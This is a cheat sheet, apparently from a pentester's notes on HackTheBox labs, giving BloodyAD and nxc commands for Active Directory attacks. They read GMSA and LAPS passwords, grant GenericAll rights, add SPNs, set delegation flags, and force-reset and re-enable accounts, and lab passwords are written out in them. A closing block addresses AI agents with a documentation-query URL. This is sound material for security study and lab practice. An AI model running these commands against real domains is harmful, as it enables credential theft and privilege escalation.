# BloodyAD ## GMSA {% code overflow="wrap" %} ```bash bloodyAD -d rebound.htb -u tbrady -p 543BOMBOMBUNmanda --host dc01.rebound.htb get object 'delegator$' --attr msDS-ManagedPassword ``` {% endcode %} ## LAPS {% code overflow="wrap" %} ```bash bloodyAD -u -d -p --host get object 'COMPUTER$' --attr ms-Mcs-AdmPwd ``` {% endcode %} ## LDAP Attributes {% code overflow="wrap" %} ```bash bloodyad -d puppy.htb -u levi.james -p KingofAkron2025! -i 10.129.232.75 get object ant.edwards ``` {% endcode %} ## Rights Assignment {% code overflow="wrap" %} ```bash # give oorend user GenericAll rights over the Service Users OU bloodyAD -d rebound.htb -u oorend -p '1GR8t@$$4u' --host dc01.rebound.htb add genericAll 'OU=SERVICE USERS,DC=REBOUND,DC=HTB' oorend ``` {% endcode %} ## SPN {% code overflow="wrap" %} ```bash # Add an SPN bloodyad -d mollysec.local --host dc.mollysec.local -u molly -p 'Pass123!' set object bob servicePrincipalName -v 'HTTP/DoesNotMatter' ``` {% endcode %} ## UAC Values The flags along with their corresponding values can be found [here](https://learn.microsoft.com/en-us/troubleshoot/windows-server/active-directory/useraccountcontrol-manipulate-account-properties#list-of-property-flags). However, instead of calculating the values manually, we can use a tool like [uacdecoder](https://uacdecoder.com/uac_decoder_tool.html#article12-9) to do it for us. ### Delegations #### Constrained {% code overflow="wrap" %} ```bash # Set CD from a Linux host bloodyad -u molly -p Pass123 -d mollysec.local -i 10.10.10.5 set object 'badPc$' userAccountControl -v 16781312 --raw # Set SPN bloodyad -u molly -p Pass123 -d mollysec.local -i 10.10.10.5 set object 'badPc$' msDS-AllowedToDelegateTo -v 'ldap/dc01.mollysec.local' ``` {% endcode %} #### Unconstrained {% code overflow="wrap" %} ```bash # Set UD from a Linux host bloodyad -u molly -p Pass123 -d mollysec.local -i 10.10.10.5 set object 'badPc$' userAccountControl -v 528384 --raw ``` {% endcode %} ### Enable User On the foothold section of [Puppy](https://www.hackthebox.com/machines/puppy), after compromising `ant.edwards`, we notice that it has `GenericAll` over `adam.silver`. Therefore, we can use that to change its password: {% code overflow="wrap" %} ```bash # Change the target's password $ nxc smb dc -u ant.edwards -p $(cat ant-password) -M change-password -o USER=adam.silver NEWPASS=Pass123 # Validate credentials $ nxc smb dc -u adam.silver -p Pass123 ... SMB 10.129.232.75 445 DC [-] PUPPY.HTB\adam.silver:Pass123 STATUS_ACCOUNT_DISABLED ``` {% endcode %} It seems that the account is disabled, which we can confirm via BloodHound:
We can decode its UAC value using [uacdecoder](https://uacdecoder.com/uac_decoder_tool.html#article12-9):
All we have to do in order to enable the object, is to subtract the value of `2` from the current flag: {% code overflow="wrap" %} ```bash # Set the new UAC value $ bloodyAD --host 10.129.232.75 -d puppy.htb -u ant.edwards -p $(cat ant-password) set object adam.silver userAccountControl -v 66048 ``` {% endcode %} ## get ### writable {% code overflow="wrap" %} ```bash bloodyad --host 10.1.168.133 -d mollysec.local -u 'molly' -p 'Pass123' get writable ``` {% endcode %} --- # Agent Instructions: Querying This Documentation If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question. Perform an HTTP GET request on the current page URL with the `ask` query parameter: ``` GET https://x7331.gitbook.io/boxes/tl-dr/active-directory/ad-tools/bloodyad.md?ask= ``` The question should be specific, self-contained, and written in natural language. The response will contain a direct answer to the question and relevant excerpts and sources from the documentation. Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.